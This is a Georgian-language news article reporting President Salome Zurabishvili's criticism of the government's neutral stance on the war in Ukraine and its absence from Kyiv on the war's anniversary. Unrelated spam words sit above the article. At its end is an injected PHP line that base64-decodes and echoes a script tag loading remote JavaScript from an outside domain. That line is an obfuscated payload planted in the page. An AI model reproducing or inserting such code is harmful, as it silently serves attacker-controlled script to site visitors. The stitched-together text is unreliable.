celsiusi
ავერსი შნაიდერი

უკრაინის ომის წლისთავთან დაკავშირებით გამართულ ცერემონიაზე საქართველოს პრეზიდენტმა სალომე ზურაბიშვილმა უკრაინასთან მიმართებით წარმოებული პოლიტიკის გამო მთავრობა გააკრიტიკა. ზურაბიშვილის შეფასებით, საქართველოს მთავრობამ ომის მიმართ საკუთარი ნეიტრალური პოზიციით თავი იზოლაციაში მოიქცია.

"ამ მოცემულობაში, არ შეიძლება არ გამოვხატო მწუხარება, იმის გამო, რომ საქართველოს მთავრობამ იზოლაციაში მოაქცია თავისი თავი, გამოეყო დემოკრატიულ თანამეგობრობას და რაღაც მიზეზებით ცდილობს, რომ გაამართლოს ყველასათვის გაუგებარი ვითომცა და ნეიტრალური თუ დაბალანსებული პოზიცია; გაუგებარი იმ ქვეყნისგან რომელმაც გაიარა იგივე განსაცდელი არაერთხელ, რომელმაც კარგად იცის თუ რას ნიშნავს მტრის მიერ სუვერენობის შელახვა და დამოუკიდებლობის წინააღმდეგ აღმართული მახვილი, რომელსაც ყველაზე კარგად ესმის ოკუპაციის სიმწარე.
საბედნიეროდ საქართველოს საზოგადოებამ ძალიან მკაფიოდ გამოხატა თავისი პოზიცია: ყველა ფორმით და საშუალება გამოიყენა, რათა საუკუნოვან მეგობარი ქვეყნისთვის სრული სოლიდარობა დაემტკიცებინა. თბილისის ქუჩებმა არაერთხელ გვაჩვენეს სად დგას ქართველი ხალხი.

გუშინ ჩვენთან ლევან სონღულაშვილმა უკრაინის ტრაგედიისთვის მიძღვნილი ნახატის დასათვალიერებლად მოიწვია ახალგაზრდები. დღეს ჩვენთან ერთად დიპლომატიური კორპუსი ეზიარება სიმბოლიკას ჩვენი ორი სახელმწიფოს ერთობისა და სიახლოვის, რაც ამ დროშებით და ჩვენი ჰიმნებით გამოიხატება. საღამოს ახალგაზრდა მწერლები და მუსიკოსები ამ ტრაგედიის მიმართ საკუთარ ხედვას გაგვიზიარებენ. თბილისი კი თავის მხრივ მსოფლიოს გაახსენებს რომ საქართველო, დგას სადაც საუკუნეების მანძილზე იდგა და „საკუთარი ინტერესების“ ძახილმა არ დაგვავიწყებინა მთავარი - საკუთარი იდენტობა და საკუთარი ღირსება.

ამ საზოგადოების სახელით, პირადად მე, როგორც ამ ქვეყნის პრეზიდენტი, ამ ერთი წლის მანძილზე ყველა შესაძლო ადგილას და ფორმატში გამოვხატე უკრაინას მიმართ საქართველოს უდრეკი მხარდაჭერა და ასეც გავაგრძელებ. მიმაჩნია, რომ საქართველოს მთავრობა თუ არა, საქართველოს პრეზიდენტი უთუოდ უნდა ყოფილიყო დღეს კიევში და ამისათვის ჩემი მზადყოფნა დროულად გამოვხატე. სამწუხაროდ მოწვევა ვერ მივიღე. სამაგიეროდ პარლამენტმა კი, მოწვევის მიუხედავად, არ მიიჩნია საჭიროდ ოფიციალურ დელეგაციის გაგზავნა. ვწუხვარ, რომ ამის შედეგად მხოლოდ ოპოზიციის სახით ვართ ჩვენ დღეს კიევში წარმოდგენილნი, თუმცა მაინც მიხარია, რომ ისინი იქ იმყოფებიან", - განაცხადა სალომე ზურაბიშვილმა.

მისი თქმით, ყველასათვის გასაგებია, რომ საქართველოს არ გააჩნია დახმარების ისეთი საშუალებები, როგორც ბევრად ძლიერ ევროპულ ქვეყნებს, რომლებსაც ევროკავშირის საზღვრები და ნატოს წევრობა უსაფრთხოების გარანტიებს ანიჭებს, თუმცა თუ ჩვენი სოლიდარობა ძირითადად მორალურ დონეზე გამოიხატება, მით უფრო მტკიცედ უნდა ვიცავდეთ ჩვენს პრინციპებს.

282
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");